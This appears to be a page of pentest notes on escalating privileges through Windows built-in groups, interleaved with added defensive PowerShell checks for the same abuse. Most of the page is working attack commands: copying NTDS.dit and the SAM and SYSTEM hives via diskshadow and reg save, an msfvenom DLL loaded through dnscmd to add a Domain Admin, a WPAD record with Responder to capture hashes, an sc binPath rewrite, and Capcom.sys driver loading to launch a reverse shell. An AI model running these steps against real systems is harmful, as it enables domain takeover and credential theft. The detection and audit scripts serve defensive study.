Windows Group Privileges


Last updated 14 days ago

Backup Operators

Membership of this group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents.

Importing Libraries

We can use the SeBackupPrivilege PowerShell cmdlets to copy files that the ACL would otherwise deny us. First, let's import the libraries in a PowerShell session.

PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll

Verifying SeBackupPrivilege is Enabled

PS> whoami /all
PS> Get-SeBackupPrivilege

## Enabling the SeBackupPrivilege
PS> Set-SeBackupPrivilege

Copying a Protected File

PS> Copy-FileSeBackupPrivilege '<path>\<file>' .\file.txt

## Using Diskshadow
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

## Backing up SAM and SYSTEM Registry Hives
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive

## Copying files with RoboCopy
cmd> robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Event Log Readers

Members of this group can read event logs on the local machine.

Searching Security Logs Using wevtutil

# Searching Security Logs Using wevtutil
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# Passing Credentials to wevtutil
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Searching Security Logs Using Get-WinEvent

Searching the Security event log with Get-WinEvent requires administrator access or permissions adjusted on the registry key HKLM\System\CurrentControlSet\Services\Eventlog\Security. Membership in just the Event Log Readers group is not sufficient.

For Get-WinEvent, the syntax is as follows. In this example, we filter for process creation events (4688) whose process command line contains /user.

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

DnsAdmins

Members of the DnsAdmins group have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM, so membership in this group could potentially be leveraged to escalate privileges on a Domain Controller or in a situation where a separate server is acting as the DNS server for the domain.

Creating a malicious DLL

On the attacking machine we can generate a malicious DLL with msfvenom that adds a user to the Domain Admins group.

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

After downloading the DLL to the target, we use the dnscmd utility to register it as a server-level plugin; only members of the DnsAdmins group are permitted to do this.

dnscmd.exe /config /serverlevelplugindll <path>\adduser.dll

The DLL is only loaded when the DNS service restarts, so we need to check our permissions on that service. First, we need our user's SID.

wmic useraccount where "name='netadm'" get sid

Once we have the user's SID, we can use the sc command to check the permissions on the service. Our user needs the RP and WP rights in the SDDL, which translate to SERVICE_START and SERVICE_STOP.

sc.exe sdshow DNS

Run this from cmd.exe (in PowerShell, sc is an alias for Set-Content, so use sc.exe there).

After confirming these permissions, we can issue the following commands to stop and start the service.

sc stop dns
sc start dns

If all goes to plan, our account will be added to the Domain Admins group or receive a reverse shell if our custom DLL was made to give us a connection back.

Creating a WPAD Record

Another way to abuse DnsAdmins group privileges is by creating a WPAD record. Membership in this group gives us the rights to disable the global query block list, which by default blocks this attack.

After disabling the global query block list and creating a WPAD record, every machine running WPAD with default settings will have its traffic proxied through our attack machine. We could use a tool such as Responder or Inveigh to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

To set up this attack, we first disable the global query block list using PowerShell.

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <hostname>

Next, we add a WPAD record pointing to our attack machine.

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName <hostname> -IPv4Address <ip>

Finally, start Responder on the attack machine.

sudo responder -I tun0
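A defender-side check for the two DnsAdmins abuse paths above (the server-level plugin DLL and the WPAD record), written here as an added example rather than taken from these notes. It assumes the DnsServer RSAT module is available and reuses inlanefreight.local from the notes as the zone name; the registry check is local to the machine it runs on.

```powershell
# Added example (not part of the original notes): audits a DNS server for the
# DnsAdmins abuse paths described above. Assumes the DnsServer RSAT module and
# the zone inlanefreight.local (taken from the notes; change it per environment).
function Test-DnsAdminsAbuseIndicators {
    param(
        [string]$ZoneName     = 'inlanefreight.local',
        [string]$ComputerName = $env:COMPUTERNAME
    )
    $findings = @()

    # 1. ServerLevelPluginDll: any value here makes dns.exe (running as SYSTEM)
    #    load that DLL on the next service start. On a healthy server it is absent.
    #    This reads the local registry only.
    $key    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $plugin = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if ($plugin) {
        $findings += [pscustomobject]@{
            Check = 'ServerLevelPluginDll'; Detail = "DNS configured to load $plugin"
        }
    }

    # 2. Global query block list: disabled, or without 'wpad', means a wpad record
    #    would be answered for every client using default proxy auto-discovery.
    $gqbl = Get-DnsServerGlobalQueryBlockList -ComputerName $ComputerName
    if (-not $gqbl.Enable -or ($gqbl.List -notcontains 'wpad')) {
        $findings += [pscustomobject]@{
            Check  = 'GlobalQueryBlockList'
            Detail = "Enable=$($gqbl.Enable); List=$($gqbl.List -join ',')"
        }
    }

    # 3. A wpad A record already present in the zone.
    $wpad = Get-DnsServerResourceRecord -ZoneName $ZoneName -Name 'wpad' -RRType A `
                -ComputerName $ComputerName -ErrorAction SilentlyContinue
    if ($wpad) {
        $findings += [pscustomobject]@{
            Check  = 'WpadRecord'
            Detail = "wpad.$ZoneName -> $($wpad.RecordData.IPv4Address -join ',')"
        }
    }
    return $findings
}

Test-DnsAdminsAbuseIndicators | Format-Table -AutoSize
```

An empty result means none of the three conditions was found; any row is a configuration that should not exist on a production DNS server without an explicit reason.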

Server Operators

The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

Querying the Service

List the installed service names (we then check which of them run as SYSTEM).

sc query | findstr SERVICE_NAME

Next, confirm that the service runs as SYSTEM and check our access rights on it; we can use the sc.exe utility or Sysinternals PsService.

sc qc <service>
.\PsService.exe security <service>

If our account has the SERVICE_ALL_ACCESS right, we have full control over the service.

Modifying the Service Binary Path

Let's change the binary path to execute a command which adds our current user to the default local administrators group.

sc config <service> binPath= "cmd /c net localgroup Administrators <user> /add"

Finally, start the service.

sc start <service>
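The commands in the Backup Operators, DnsAdmins and Server Operators sections above all leave traces in the Security log. The following is an added detection example, not part of the original notes; it assumes process creation auditing with command-line logging is enabled (event 4688 with Properties[8] as the command line, as used on this page) and that security group management auditing (4728/4732) is on.

```powershell
# Added example (not part of the original notes): scans the local Security log
# for the command lines and group changes that the Backup Operators, DnsAdmins
# and Server Operators techniques above leave behind. Assumes 4688 with
# command-line logging (Properties[8]) and group management auditing (4728/4732).
function Find-PrivilegedGroupAbuse {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    # Command-line indicators: service binPath rewrite, DNS plugin DLL load,
    # hive backups and shadow copies used to read SAM/NTDS.dit offline.
    $regex = @(
        'sc(\.exe)?\s+config\s+\S+\s+binPath=',
        'dnscmd(\.exe)?\s+.*serverlevelplugindll',
        'reg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)',
        'diskshadow',
        'Set-DnsServerGlobalQueryBlockList\s+-Enable\s+\$false',
        'robocopy\s+/B\s'
    ) -join '|'

    $hits = @()
    $hits += @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[8].Value -match $regex } |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                EventId = $_.Id
                Subject = $_.Properties[1].Value   # SubjectUserName
                Detail  = $_.Properties[8].Value   # CommandLine
            }
        })

    # 4732 = member added to a security-enabled local group (e.g. Administrators)
    # 4728 = member added to a security-enabled global group (e.g. Domain Admins)
    $hits += @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4732, 4728; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                EventId = $_.Id
                Subject = $_.Properties[6].Value   # SubjectUserName
                Detail  = "Added SID $($_.Properties[1].Value) to group $($_.Properties[2].Value)"
            }
        })

    return $hits | Sort-Object Time
}

Find-PrivilegedGroupAbuse | Format-Table -AutoSize -Wrap
```

Legitimate backup jobs and service installs will also match, so the output is a triage list to correlate with the Subject column and change records, not an alert by itself.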

Print Operators

The Print Operators group is a highly privileged group in Windows that grants its members several significant permissions, including:

  • SeLoadDriverPrivilege: Allows members to load and manage system drivers.

  • The ability to manage, create, share, and delete printers connected to a Domain Controller.

  • The ability to log on locally to a Domain Controller and shut it down.

Given these privileges, members of this group can load system drivers, enabling them to exploit the system further.

Using Capcom.sys for Privilege Escalation

The Capcom.sys driver is a well-known driver that allows users to execute shellcode with system privileges. This driver can be particularly useful for escalating privileges in a Windows environment.

Download the Capcom.sys Driver

The Capcom.sys driver can be downloaded from the following GitHub repository:

Additionally, you can find useful tools such as LoadDriver.exe and ExploitCapcom.exe in the following repository:

Create a Malicious Executable:

Using msfvenom, create a malicious executable (e.g., rev.exe) that will provide a reverse shell when executed. This executable will be run with elevated privileges after loading the Capcom.sys driver.

Load the Capcom.sys Driver:

Use the LoadDriver.exe tool to load the Capcom.sys driver. The command syntax is as follows:

.\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\Test\Capcom.sys

Upon successful execution, this command should return NTSTATUS: 00000000, WinError: 0. If it does not, check the location of Capcom.sys or ensure that you are executing LoadDriver.exe from the correct directory.

Execute the Malicious Executable:

After successfully loading the driver, use ExploitCapcom.exe to execute your malicious executable with elevated privileges:

.\ExploitCapcom.exe C:\Windows\Place\to\reverseshell\rev.exe

This command runs the rev.exe file with system privileges, providing the attacker with a reverse shell.

We can use PsService, the service viewer/controller that is part of the Sysinternals suite, to check permissions on a service (see the Server Operators section above).
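Every section on this page starts from membership of a built-in group, so the simplest control is knowing who is in them. The following membership audit is an added example, not part of the original notes; it assumes the ActiveDirectory RSAT module on a domain-joined host, and the $Expected allowlist is a placeholder to fill in per environment.

```powershell
# Added example (not part of the original notes): reports who is in the
# privileged built-in groups covered on this page and flags members not on an
# allowlist. Assumes the ActiveDirectory RSAT module on a domain-joined host;
# the $Expected table is a placeholder to be filled in per environment.
function Get-PrivilegedGroupReport {
    param(
        [string[]]$Groups = @('Backup Operators', 'Event Log Readers', 'DnsAdmins',
                              'Server Operators', 'Print Operators'),
        [hashtable]$Expected = @{ 'Backup Operators' = @('svc_backup') }  # placeholder
    )
    foreach ($g in $Groups) {
        # -Recursive expands nested groups, so rights inherited through a nested
        # group are reported against the account that actually holds them.
        $members = Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue
        foreach ($m in $members) {
            [pscustomobject]@{
                Group       = $g
                Member      = $m.SamAccountName
                ObjectClass = $m.objectClass
                Expected    = [bool]($Expected.ContainsKey($g) -and
                                     $Expected[$g] -contains $m.SamAccountName)
            }
        }
    }
}

# Anything not on the allowlist is a finding to review.
Get-PrivilegedGroupReport | Where-Object { -not $_.Expected } | Format-Table -AutoSize
```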

PoC
PsService
Capcom-Rootkit - Capcom.sys
SeLoadDriverPrivilege - Josh Morrison